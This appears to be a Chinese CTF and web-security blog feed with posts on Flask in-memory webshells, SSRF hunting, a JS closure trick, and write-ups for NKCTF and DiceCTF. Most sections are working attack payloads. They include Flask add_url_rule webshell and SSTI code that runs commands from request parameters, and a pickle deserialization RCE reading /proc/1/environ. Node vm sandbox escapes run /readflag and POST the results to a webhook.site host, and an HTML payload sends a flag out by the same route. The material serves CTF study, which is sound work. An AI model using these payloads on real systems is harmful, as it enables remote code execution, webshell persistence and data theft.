/tags/2024/Recent content in 2024 on chleynx's blogHugozh-cnSat, 20 Jul 2024 09:22:51 +0800/posts/memory-horse-in-flask/Sat, 20 Jul 2024 09:22:51 +0800/posts/memory-horse-in-flask/<h1 id="flask下python内存马">FLASK下python内存马</h1> <p><a href="https://github.com/bfengj/CTF/blob/main/Web/python/%5BPython%5DFlask%E5%86%85%E5%AD%98%E9%A9%AC%E5%AD%A6%E4%B9%A0.md">Python]Flask内存马学习.md at main · bfengj/CTF (github.com)</a></p> <p><a href="https://longlone.top/%E5%AE%89%E5%85%A8/%E5%AE%89%E5%85%A8%E7%A0%94%E7%A9%B6/flask%E4%B8%8D%E5%87%BA%E7%BD%91%E5%9B%9E%E6%98%BE%E6%96%B9%E5%BC%8F/">flask不出网回显方式 - Longlone&rsquo;s Blog</a></p> <h2 id="初始">初始</h2> <p>在一个月黑风高的夜晚，看见一个从未见过的函数add_url_rule，然后经过亿系列的查询发现是flask的内存马常用的东西</p> <pre tabindex="0"><code>add_url_rule() 可以添加一个自定义路由，并且可以自定义匿名函数，访问这个路由就可以调用这个匿名函数 </code></pre><p>这里有payload</p> <pre tabindex="0"><code>sys.modules[&#39;__main__&#39;].__dict__[&#39;app&#39;].add_url_rule(&#39;/shell&#39;,&#39;shell&#39;,lambda :__import__(&#39;os&#39;).popen(&#39;dir&#39;).read()) ssti: {{url_for.__globals__[&#39;__builtins__&#39;][&#39;eval&#39;](\&#34;app.add_url_rule(&#39;/shell&#39;, &#39;myshell&#39;, lambda :__import__(&#39;os&#39;).popen(_request_ctx_stack.top.request.args.get(&#39;cmd&#39;)).read())\&#34;,{&#39;_request_ctx_stack&#39;:url_for.__globals__[&#39;_request_ctx_stack&#39;],&#39;app&#39;:url_for.__globals__[&#39;current_app&#39;]})}}&#34; </code></pre><p>但是！这是老版本的，关闭debug模式会调用到check函数，然后会导致报错</p> <p>然而在新版本当中，很多地方都存在check函数，so，G</p> <p>然后看见有师傅提供了方法</p> <pre tabindex="0"><code>通过@app.before_request @app.after_request来打 </code></pre>/posts/aes-cbc%E5%8F%8D%E8%BD%AC/Tue, 25 Jun 2024 00:22:51 +0800/posts/aes-cbc%E5%8F%8D%E8%BD%AC/<h1 id="aes-cbc反转攻击">AES-CBC反转攻击</h1> <p>在一些特定情况下才能使用</p>/posts/closure-privilege-escalation/Wed, 12 Jun 2024 00:22:51 +0800/posts/closure-privilege-escalation/<h2 id="闭包提权">闭包提权：</h2> <pre tabindex="0"><code>var o = (function() { var obj = { a: 1, flag: &#34;flag{test}&#34;, }; return { get: function(k) { return obj[k]; }, add: function() { n++; } }; } )(); console.log(o.get(&#34;flag&#34;)) // flag{test} </code></pre><p>首先，这里通过闭包实现了将obj这个对象让外面不可更改。实现只读的效果。</p> <p>作用：比如在有些环境下，如第三方库当中，需要保持稳定性，防止一个库被另一个库修改。</p> <p>利用：</p> <pre tabindex="0"><code> console.log(o.get(&#34;valueOf&#34;)) //[Function: valueOf] console.log(o.get(&#34;valueOf&#34;)()) // TypeError: Cannot convert undefined or null to objec // 由于valueOf是Object.prototype的方法，所以在调用时，this指向的是Object.prototype，而Object.prototype并没有flag属性，所以会报错 //定义一个原型，让obj[k]能拿到这个原型，然后返回this指向obj Object.defineProperty(Object.prototype, &#34;hacker&#34;, { get: function() { return this; } }); console.log(o.get(&#34;flag&#34;)) // flag{test} console.log(o.get(&#34;hacker&#34;)) // { a: 1, flag: &#39;flag{test}&#39; } let obj1 = o.get(&#34;hacker&#34;); obj1.flag = 2; console.log(o.get(&#34;flag&#34;)) // 2 if (o.get(&#34;flag&#34;) !== &#34;flag{test}&#34;) { console.log(&#34;flag is correct!&#34;); } // flag is correct! </code></pre><p>利用成功</p>/posts/ssrf/Sat, 01 Jun 2024 18:38:57 +0800/posts/ssrf/<h2 id="ssrf简介">SSRF简介</h2> <p>SSRF (Server-Side Request Forgery,服务器端请求伪造)是一种由攻击者构造请求，由服务端发起请求的安全漏洞。一般情况下，SSRF攻击的目标是外网无法访问的内部系统(正因为请求是由服务端发起的，所以服务端能请求到与自身相连而与外网隔离的内部系统)。</p> <p>也就是（如果A是外网主机，B是不能访问外网的主机，C是能够访问A和B的主机&mdash;&mdash;-&gt;SSRF也就是A通过C访问B）</p> <h2 id="ssrf漏洞原理">SSRF漏洞原理</h2> <p>SSRF的形成大多是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。例如，黑客操作服务端从指定URL地址获取网页文本内容，加载指定地址的图片等，利用的是服务端的请求伪造。SSRF利用存在缺陷的Web 应用作为代理攻击远程和本地的服务器。</p> <p>攻击方式：</p> <ol> <li> <p>对外网、服务器所在内网、本地进行端口扫描，获取一些服务的banner信息。</p> </li> <li> <p>攻击运行在内网或本地的应用程序。</p> </li> <li> <p>对内网Web应用进行指纹识别，识别企业内部的资产信息。</p> </li> <li> <p>攻击内外网的Web应用，主要是使用HTTP GET请求就可以实现的攻击(比如struts2、SQli等)。</p> <p>利用gopher协议可以攻击内网的 Redis、Mysql、FastCGI、Ftp 等，也可以发送 GET、POST 请求，这可以拓宽 SSRF 的攻击面。</p> </li> <li> <p>利用file协议读取本地文件等。</p> </li> </ol> <h2 id="常用函数">常用函数</h2> <pre tabindex="0"><code>file_get_contents()、fsockopen()、curl_exec()、fopen()、readfile() </code></pre><h2 id="漏洞点">漏洞点</h2> <h3 id="常见ssrf漏洞验证方式">常见SSRF漏洞验证方式</h3> <pre tabindex="0"><code>排除法：浏览器f12查看源代码看是否是在本地进行了请求 比如：该资源地址类型为 http://www.xxx.com/a.php?image=URL,URL参数若是其他服务器地址就可能存在SSRF漏洞 dnslog等工具进行测试，看是否被访问(可以在盲打后台，用例中将当前准备请求的url和参数编码成base64，这样盲打后台解码后就知道是哪台机器哪个cgi触发的请求) 抓包分析发送的请求是不是通过服务器发送的，如果不是客户端发出的请求，则有可能是存在漏洞。接着找存在HTTP服务的内网地址 从漏洞平台中的历史漏洞寻找泄漏的存在web应用内网地址 通过二级域名暴力猜解工具模糊猜测内网地址 通过file协议读取内网信息获取相关地址 直接返回的Banner、title、content等信息 留意布尔型SSRF，通过判断两次不同请求结果的差异来判断是否存在SSRF，类似布尔型sql盲注方法。 </code></pre><h3 id="ssrf漏洞点挖掘">SSRF漏洞点挖掘</h3> <pre tabindex="0"><code>1. 社交分享功能：获取超链接的标题等内容进行显示 2. 转码服务：通过URL地址把原地址的网页内容调优使其适合手机屏幕浏览 3. 在线翻译：给网址翻译对应网页的内容 4. 图片加载/下载：例如富文本编辑器中的点击下载图片到本地；通过URL地址加载或下载图片 5. 图片/文章收藏功能：主要其会取URL地址中title以及文本的内容作为显示以求一个好的用具体验 6. 云服务厂商：它会远程执行一些命令来判断网站是否存活等，所以如果可以捕获相应的信息，就可以进行ssrf测试 7. 网站采集，网站抓取的地方：一些网站会针对你输入的url进行一些信息采集工作 8. 数据库内置功能：数据库的比如mongodb的copyDatabase函数 9. 邮件系统：比如接收邮件服务器地址 10. 编码处理, 属性信息处理，文件处理：比如ffpmg，ImageMagick，docx，pdf，xml处理器等 11. 未公开的api实现以及其他扩展调用URL的功能：可以利用google 语法加上这些关键字去寻找SSRF漏洞 12.从远程服务器请求资源（upload from url 如discuz！；import &amp; expost rss feed 如web blog；使用了xml引擎对象的地方 如wordpress xmlrpc.php） </code></pre><p>url关键字</p> <pre tabindex="0"><code>Share、wap、url、link、src、source、target、u、3g、display、sourceURL、imageURL、domain </code></pre><p><a href="https://www.cnblogs.com/miruier/p/13907150.html">看看这里吧！！！SSRF漏洞</a></p> <h4 id="题目easycms">题目easycms：</h4> <p>搜索到迅睿cms 曾经存在ssrf，审计代码发现qrcode路由存在ssrf构造如下</p> <pre tabindex="0"><code>http://eci-2ze3cmcfbu4h73d67lga.cloudeci1.ichunqiu.com/index.php ?s=api &amp;c=api &amp;m=qrcode &amp;thumb=http://test.ai.darwinchow.com &amp;text=sfaf &amp;size=11 &amp;level=1 </code></pre><p>发现存在ssrf,但是直接访问127.0.0.1是被过滤的 尝试302去绕过</p> <p>302配置如下</p>/posts/nkctf/Mon, 25 Mar 2024 00:48:41 +0800/posts/nkctf/<h2></h2> <h2 id="attack_"><strong>attack_tacooooo</strong></h2> <p>账号tacooooo@qq.com</p> <p>密码tacooooo</p> <pre tabindex="0"><code>import pickle class Exploit(object): def __reduce__(self): code = &#34;&#34;&#34; import os def find_flag_and_write(source_directory, destination_path, destination_file_name): with open(&#34;/proc/1/environ&#34;, &#39;r&#39;) as flag_file: flag_content = flag_file.read() destination_file_path = os.path.join(destination_path, destination_file_name) with open(destination_file_path, &#39;a&#39;) as destination_file: destination_file.write(flag_content) find_flag_and_write(&#39;/&#39;, &#39;../var/lib/pgadmin/storage/tacooooo_qq.com/&#39;, &#39;flag.txt&#39;) &#34;&#34;&#34; # 使用纯 Python 代码来写入文件 return (exec, (code,)) # 序列化 exploit 对象 with open(&#39;posix.pickle&#39;, &#39;wb&#39;) as f: pickle.dump(Exploit(), f) </code></pre><h2 id="全世界最简单的ctf"><strong>全世界最简单的CTF</strong></h2> <p>source</p> <pre tabindex="0"><code>const express = require(&#39;express&#39;); const bodyParser = require(&#39;body-parser&#39;); const app = express(); const fs = require(&#34;fs&#34;); const path = require(&#39;path&#39;); const vm = require(&#34;vm&#34;); app.use(bodyParser.json()) .set(&#39;views&#39;, path.join(__dirname, &#39;views&#39;)) .use(express.static(path.join(__dirname, &#39;/public&#39;))) app.get(&#39;/&#39;, function(req, res) { res.sendFile(__dirname + &#39;/public/home.html&#39;); }) function waf(code) { let pattern = /(process|\[.*?\]|exec|spawn|Buffer|\\|\+|concat|eval|Function)/g; if (code.match(pattern)) { throw new Error(&#34;what can I say? hacker out!!&#34;); } } app.post(&#39;/&#39;, function(req, res) { let code = req.body.code; let sandbox = Object.create(null); let context = vm.createContext(sandbox); try { waf(code) let result = vm.runInContext(code, context); console.log(result); } catch (e) { console.log(e.message); require(&#39;./hack&#39;); } }) app.get(&#39;/secret&#39;, function(req, res) { if (process.__filename == null) { let content = fs.readFileSync(__filename, &#34;utf-8&#34;); return res.send(content); } else { let content = fs.readFileSync(process.__filename, &#34;utf-8&#34;); return res.send(content); } }) app.listen(3000, () =&gt; { console.log(&#34;listen on 3000&#34;); }) </code></pre><pre tabindex="0"><code>payload: 1、 throw new Proxy({}, { get: function() { const cc = arguments.callee.caller; const g = (cc.constructor.constructor(`return ${`${&#39;proces&#39;}s`}`))(); const h = g.mainModule.require(&#39;fs&#39;).readFileSync(&#39;/proc/self/environ&#39;); const p = (cc.constructor.constructor(&#39;return fetch&#39;))(); return p(&#34;https://webhook.site/1dc4e877-3eb8-4642-a3ef-17fc03f43ffa&#34;, {method: &#34;POST&#34;, body: JSON.stringify({data: `${h}`})}); } }) exec被ban然后执行不了命令，中括号我本地能过，但是环境上不行。fs模块读不到flag文件。 2、 过滤了中括号 throw new Proxy({}, { get: function() { const cc = arguments.callee.caller; const gg = (cc.constructor.constructor(`return ${`${&#39;proces&#39;}s`}`))(); const hh = gg.mainModule.require(`${&#39;child_p&#39;}rocess`); const ff = (cc.constructor.constructor(`s = 1+2`))(); const p = (cc.constructor.constructor(&#39;return fetch&#39;))(); return p(&#34;https://webhook.site/1dc4e877-3eb8-4642-a3ef-17fc03f43ffa&#34;, {method: &#34;POST&#34;, body: JSON.stringify({data: `${s}`})}); } }) 两个思路： 再构造一个函数。-------------不知道为什么不行 可以写入js文件，使用fork执行然后fetch出来。--------------ok！ payload： // 文件写入suceess throw new Proxy({}, { get: function() { const cc = arguments.callee.caller; const gg = (cc.constructor.constructor(`return ${`${&#39;proces&#39;}s`}`))(); let content = ` let cs = require(&#39;${`${&#39;child_p&#39;}rocess&#39;).exe`}cSync(&#39;/readflag&#39;).toString(); ${`${&#39;proces&#39;}s`}.on(&#34;message&#34;,function(msg){ fetch(&#34;https://webhook.site/1dc4e877-3eb8-4642-a3ef-17fc03f43ffa&#34;, {method: &#34;POST&#34;, body: JSON.stringify({data: cs})}); }) `; const fs = gg.mainModule.require(&#39;fs&#39;).appendFileSync(&#34;./readflag1.js&#34;,content); const p = (cc.constructor.constructor(&#39;return fetch&#39;))(); return p(&#34;https://webhook.site/1dc4e877-3eb8-4642-a3ef-17fc03f43ffa&#34;, {method: &#34;POST&#34;, body: JSON.stringify({data: `${fs}`})}); } }) //通信成功 throw new Proxy({}, { get: function() { const cc = arguments.callee.caller; const g = (cc.constructor.constructor(`return ${`${&#39;proces&#39;}s`}`))(); const h = g.mainModule.require(`${&#39;child_p&#39;}rocess`).fork(&#39;./readflag1.js&#39;); h.send(&#39;hello&#39;); const p = (cc.constructor.constructor(&#39;return fetch&#39;))(); return p(&#34;https://webhook.site/1dc4e877-3eb8-4642-a3ef-17fc03f43ffa&#34;, {method: &#34;POST&#34;, body: JSON.stringify({data: `${h}`})}); } }) { &#34;data&#34;: &#34;NKCTF{5e1d772e-8260-444d-ab4b-21c7b7603521}\n&#34; } </code></pre><h3 id="img"><img src="/1.png" alt="img"></h3> <h2 id="my-first-cms"><strong>my first cms</strong></h2> <p>这是什么cms？直接安装最新版的应该没有问题了吧……</p> <p><a href="https://github.com/capture0x/CMSMadeSimple2">GitHub - capture0x/CMSMadeSimple2: CMS Made Simple Version: 2.2.19 - SSTI</a></p> <p>admin Admin123</p>/posts/dicectf/Tue, 06 Feb 2024 14:06:46 +0800/posts/dicectf/<h2 id="another-csp">another-csp</h2> <h3 id="indexjs">index.js</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-javascript" data-lang="javascript"><span style="display:flex;"><span><span style="color:#66d9ef">import</span> { <span style="color:#a6e22e">createServer</span> } <span style="color:#a6e22e">from</span> <span style="color:#e6db74">&#39;http&#39;</span>; </span></span><span style="display:flex;"><span><span style="color:#66d9ef">import</span> { <span style="color:#a6e22e">readFileSync</span> } <span style="color:#a6e22e">from</span> <span style="color:#e6db74">&#39;fs&#39;</span>; </span></span><span style="display:flex;"><span><span style="color:#66d9ef">import</span> { <span style="color:#a6e22e">spawn</span> } <span style="color:#a6e22e">from</span> <span style="color:#e6db74">&#39;child_process&#39;</span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">import</span> { <span style="color:#a6e22e">randomInt</span> } <span style="color:#a6e22e">from</span> <span style="color:#e6db74">&#39;crypto&#39;</span>; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">const</span> <span style="color:#a6e22e">sleep</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">timeout</span> =&gt; <span style="color:#66d9ef">new</span> Promise(<span style="color:#a6e22e">resolve</span> =&gt; <span style="color:#a6e22e">setTimeout</span>(<span style="color:#a6e22e">resolve</span>, <span style="color:#a6e22e">timeout</span>)); </span></span><span style="display:flex;"><span><span style="color:#66d9ef">const</span> <span style="color:#a6e22e">wait</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">child</span> =&gt; <span style="color:#66d9ef">new</span> Promise(<span style="color:#a6e22e">resolve</span> =&gt; <span style="color:#a6e22e">child</span>.<span style="color:#a6e22e">on</span>(<span style="color:#e6db74">&#39;exit&#39;</span>, <span style="color:#a6e22e">resolve</span>)); </span></span><span style="display:flex;"><span><span style="color:#66d9ef">const</span> <span style="color:#a6e22e">index</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">readFileSync</span>(<span style="color:#e6db74">&#39;index.html&#39;</span>, <span style="color:#e6db74">&#39;utf-8&#39;</span>); </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">let</span> <span style="color:#a6e22e">token</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">randomInt</span>(<span style="color:#ae81ff">2</span> <span style="color:#f92672">**</span> <span style="color:#ae81ff">24</span>).<span style="color:#a6e22e">toString</span>(<span style="color:#ae81ff">16</span>).<span style="color:#a6e22e">padStart</span>(<span style="color:#ae81ff">6</span>, <span style="color:#e6db74">&#39;0&#39;</span>); </span></span><span style="display:flex;"><span><span style="color:#66d9ef">let</span> <span style="color:#a6e22e">browserOpen</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">false</span>; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">const</span> <span style="color:#a6e22e">visit</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">async</span> <span style="color:#a6e22e">code</span> =&gt; { </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">browserOpen</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">const</span> <span style="color:#a6e22e">proc</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">spawn</span>(<span style="color:#e6db74">&#39;node&#39;</span>, [<span style="color:#e6db74">&#39;visit.js&#39;</span>, <span style="color:#a6e22e">token</span>, <span style="color:#a6e22e">code</span>], { <span style="color:#a6e22e">detached</span><span style="color:#f92672">:</span> <span style="color:#66d9ef">true</span> }); </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">await</span> Promise.<span style="color:#a6e22e">race</span>([ </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">wait</span>(<span style="color:#a6e22e">proc</span>), </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">sleep</span>(<span style="color:#ae81ff">10000</span>) </span></span><span style="display:flex;"><span> ]); </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">proc</span>.<span style="color:#a6e22e">exitCode</span> <span style="color:#f92672">===</span> <span style="color:#66d9ef">null</span>) { </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">process</span>.<span style="color:#a6e22e">kill</span>(<span style="color:#f92672">-</span><span style="color:#a6e22e">proc</span>.<span style="color:#a6e22e">pid</span>); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">browserOpen</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">false</span>; </span></span><span style="display:flex;"><span>} </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#a6e22e">createServer</span>(<span style="color:#66d9ef">async</span> (<span style="color:#a6e22e">req</span>, <span style="color:#a6e22e">res</span>) =&gt; { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">const</span> <span style="color:#a6e22e">url</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">new</span> <span style="color:#a6e22e">URL</span>(<span style="color:#a6e22e">req</span>.<span style="color:#a6e22e">url</span>, <span style="color:#e6db74">&#39;http://localhost/&#39;</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">url</span>.<span style="color:#a6e22e">pathname</span> <span style="color:#f92672">===</span> <span style="color:#e6db74">&#39;/&#39;</span>) { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> <span style="color:#a6e22e">res</span>.<span style="color:#a6e22e">end</span>(<span style="color:#a6e22e">index</span>); </span></span><span style="display:flex;"><span> } <span style="color:#66d9ef">else</span> <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">url</span>.<span style="color:#a6e22e">pathname</span> <span style="color:#f92672">===</span> <span style="color:#e6db74">&#39;/bot&#39;</span>) { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">browserOpen</span>) <span style="color:#66d9ef">return</span> <span style="color:#a6e22e">res</span>.<span style="color:#a6e22e">end</span>(<span style="color:#e6db74">&#39;already open!&#39;</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">const</span> <span style="color:#a6e22e">code</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">url</span>.<span style="color:#a6e22e">searchParams</span>.<span style="color:#a6e22e">get</span>(<span style="color:#e6db74">&#39;code&#39;</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span><span style="color:#a6e22e">code</span> <span style="color:#f92672">||</span> <span style="color:#a6e22e">code</span>.<span style="color:#a6e22e">length</span> <span style="color:#f92672">&gt;</span> <span style="color:#ae81ff">1000</span>) <span style="color:#66d9ef">return</span> <span style="color:#a6e22e">res</span>.<span style="color:#a6e22e">end</span>(<span style="color:#e6db74">&#39;no&#39;</span>); </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">visit</span>(<span style="color:#a6e22e">code</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> <span style="color:#a6e22e">res</span>.<span style="color:#a6e22e">end</span>(<span style="color:#e6db74">&#39;visiting&#39;</span>); </span></span><span style="display:flex;"><span> } <span style="color:#66d9ef">else</span> <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">url</span>.<span style="color:#a6e22e">pathname</span> <span style="color:#f92672">===</span> <span style="color:#e6db74">&#39;/flag&#39;</span>) { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">url</span>.<span style="color:#a6e22e">searchParams</span>.<span style="color:#a6e22e">get</span>(<span style="color:#e6db74">&#39;token&#39;</span>) <span style="color:#f92672">!==</span> <span style="color:#a6e22e">token</span>) { </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">res</span>.<span style="color:#a6e22e">end</span>(<span style="color:#e6db74">&#39;wrong&#39;</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">await</span> <span style="color:#a6e22e">sleep</span>(<span style="color:#ae81ff">1000</span>); </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">process</span>.<span style="color:#a6e22e">exit</span>(<span style="color:#ae81ff">0</span>); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> <span style="color:#a6e22e">res</span>.<span style="color:#a6e22e">end</span>(<span style="color:#a6e22e">process</span>.<span style="color:#a6e22e">env</span>.<span style="color:#a6e22e">FLAG</span> <span style="color:#f92672">??</span> <span style="color:#e6db74">&#39;dice{flag}&#39;</span>); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> <span style="color:#a6e22e">res</span>.<span style="color:#a6e22e">end</span>(); </span></span><span style="display:flex;"><span>}).<span style="color:#a6e22e">listen</span>(<span style="color:#ae81ff">8080</span>); </span></span></code></pre></div><h3 id="visitjs">visit.js</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-javascript" data-lang="javascript"><span style="display:flex;"><span><span style="color:#66d9ef">import</span> <span style="color:#a6e22e">puppeteer</span> <span style="color:#a6e22e">from</span> <span style="color:#e6db74">&#39;puppeteer&#39;</span>; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">const</span> <span style="color:#a6e22e">browser</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">await</span> <span style="color:#a6e22e">puppeteer</span>.<span style="color:#a6e22e">launch</span>({ </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">pipe</span><span style="color:#f92672">:</span> <span style="color:#66d9ef">true</span>, </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">args</span><span style="color:#f92672">:</span> [ </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#39;--no-sandbox&#39;</span>, </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#39;--disable-setuid-sandbox&#39;</span>, </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#39;--js-flags=--noexpose_wasm,--jitless&#39;</span>, </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#39;--incognito&#39;</span> </span></span><span style="display:flex;"><span> ], </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">dumpio</span><span style="color:#f92672">:</span> <span style="color:#66d9ef">true</span>, </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">headless</span><span style="color:#f92672">:</span> <span style="color:#e6db74">&#39;new&#39;</span> </span></span><span style="display:flex;"><span>}); </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">const</span> [<span style="color:#a6e22e">token</span>, <span style="color:#a6e22e">code</span>] <span style="color:#f92672">=</span> <span style="color:#a6e22e">process</span>.<span style="color:#a6e22e">argv</span>.<span style="color:#a6e22e">slice</span>(<span style="color:#ae81ff">2</span>); </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">try</span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">const</span> <span style="color:#a6e22e">page</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">await</span> <span style="color:#a6e22e">browser</span>.<span style="color:#a6e22e">newPage</span>(); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">await</span> <span style="color:#a6e22e">page</span>.<span style="color:#66d9ef">goto</span>(<span style="color:#e6db74">&#39;http://127.0.0.1:8080&#39;</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">await</span> <span style="color:#a6e22e">page</span>.<span style="color:#a6e22e">evaluate</span>((<span style="color:#a6e22e">token</span>, <span style="color:#a6e22e">code</span>) =&gt; { </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">localStorage</span>.<span style="color:#a6e22e">setItem</span>(<span style="color:#e6db74">&#39;token&#39;</span>, <span style="color:#a6e22e">token</span>); </span></span><span style="display:flex;"><span> document.<span style="color:#a6e22e">getElementById</span>(<span style="color:#e6db74">&#39;code&#39;</span>).<span style="color:#a6e22e">value</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">code</span>; </span></span><span style="display:flex;"><span> }, <span style="color:#a6e22e">token</span>, <span style="color:#a6e22e">code</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">await</span> <span style="color:#a6e22e">page</span>.<span style="color:#a6e22e">click</span>(<span style="color:#e6db74">&#39;#submit&#39;</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">await</span> <span style="color:#a6e22e">page</span>.<span style="color:#a6e22e">waitForFrame</span>(<span style="color:#a6e22e">frame</span> =&gt; <span style="color:#a6e22e">frame</span>.<span style="color:#a6e22e">name</span>() <span style="color:#f92672">==</span> <span style="color:#e6db74">&#39;sandbox&#39;</span>, { <span style="color:#a6e22e">timeout</span><span style="color:#f92672">:</span> <span style="color:#ae81ff">1000</span> }); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">await</span> <span style="color:#a6e22e">page</span>.<span style="color:#a6e22e">close</span>(); </span></span><span style="display:flex;"><span>} <span style="color:#66d9ef">catch</span>(<span style="color:#a6e22e">e</span>) { </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">console</span>.<span style="color:#a6e22e">error</span>(<span style="color:#a6e22e">e</span>); </span></span><span style="display:flex;"><span>}; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">await</span> <span style="color:#a6e22e">browser</span>.<span style="color:#a6e22e">close</span>(); </span></span></code></pre></div><p>只等待1s</p> <pre tabindex="0"><code>await page.waitForFrame(frame =&gt; frame.name() == &#39;sandbox&#39;, { timeout: 1000 }); </code></pre><p>[CSS：在相对颜色语法中使用 color-mix 制作的颜色会导致选项卡崩溃并显示 SIGILL <a href="https://issues.chromium.org/issues/41490764">41490764] - Chromium</a></p> <pre tabindex="0"><code>&lt;!DOCTYPE html&gt; &lt;html lang=&#34;en&#34;&gt; &lt;head&gt; &lt;meta charset=&#34;UTF-8&#34;&gt; &lt;meta name=&#34;viewport&#34; content=&#34;width=device-width, initial-scale=1.0&#34;&gt; &lt;title&gt;CSS SIGILL Issue Repro&lt;/title&gt; &lt;style&gt; div { --c1: color-mix(in srgb, blue 50%, red); --c2: srgb(from var(--c1) r g b); background-color: var(--c2); } &lt;/style&gt; &lt;/head&gt; &lt;body&gt; &lt;div&gt;This should be purple&lt;/div&gt; &lt;/body&gt; &lt;/html&gt; </code></pre><p>终止报错</p> <pre tabindex="0"><code>&lt;link rel=&#34;stylesheet&#34; href=&#34;https://webhook.site/aee8bc6e-8b49-4193-9a96-291dc379b94f&#34;&gt;&lt;iframe src=&#34;http://localhost/flag&#34; csp=&#34;img-src &lt;https://*&gt;; defascript-srcult-sscript-srcrc &lt;https://*&gt;; repscript-srcort-uscript-srcri &lt;https://*&gt;;&#34; referrerpolicy=&#34;no-referrer&#34;&gt; &lt;img src=&#34;https://webhook.site/aee8bc6e-8b49-4193-9a96-291dc379b94f&#34;&gt; &lt;script&gt; flag=document.getElementsByTagName(&#34;pre&#34;)[0]; fetch(&#34;https://webhook.site/aee8bc6e-8b49-4193-9a96-291dc379b94f?flag=${encodeURIComponent(flag)}&#34;) .then(response =&gt; { // 检查响应状态 if (!response.ok) { throw new Error(`HTTP error! Status: ${response.status}`); } // 将响应转换为 JSON return response.json(); }) ); &lt;/script&gt; &lt;/iframe&gt; </code></pre><h2 id="dicedicegoose">dicedicegoose</h2> <p><img src="./image-20240206131947119-1707199656435-3.png" alt="image-20240206131947119"></p>/posts/xihulunjian/Mon, 05 Feb 2024 00:48:41 +0800/posts/xihulunjian/<h2 id="only_sql">only_sql</h2> <p>连上自己的数据库，load data写文件进去</p> <p>读到源码：</p> <pre tabindex="0"><code>&lt;?php error_reporting(0); // mine // $db_host = &#39;127.0.0.1&#39;; // $db_username = &#39;root&#39;; // $db_password = &#39;1q2w3e4r5t!@#&#39;; // $db_name = &#39;mysql&#39;; $db_host = $_POST[&#34;db_host&#34;]; $db_username = $_POST[&#34;db_username&#34;]; $db_password = $_POST[&#34;db_password&#34;]; $db_name = $_POST[&#34;db_name&#34;]; if(isset($db_host)){ try { $dsn = &#34;mysql:host=$db_host;dbname=$db_name&#34;; $pdo = new PDO($dsn, $db_username, $db_password); 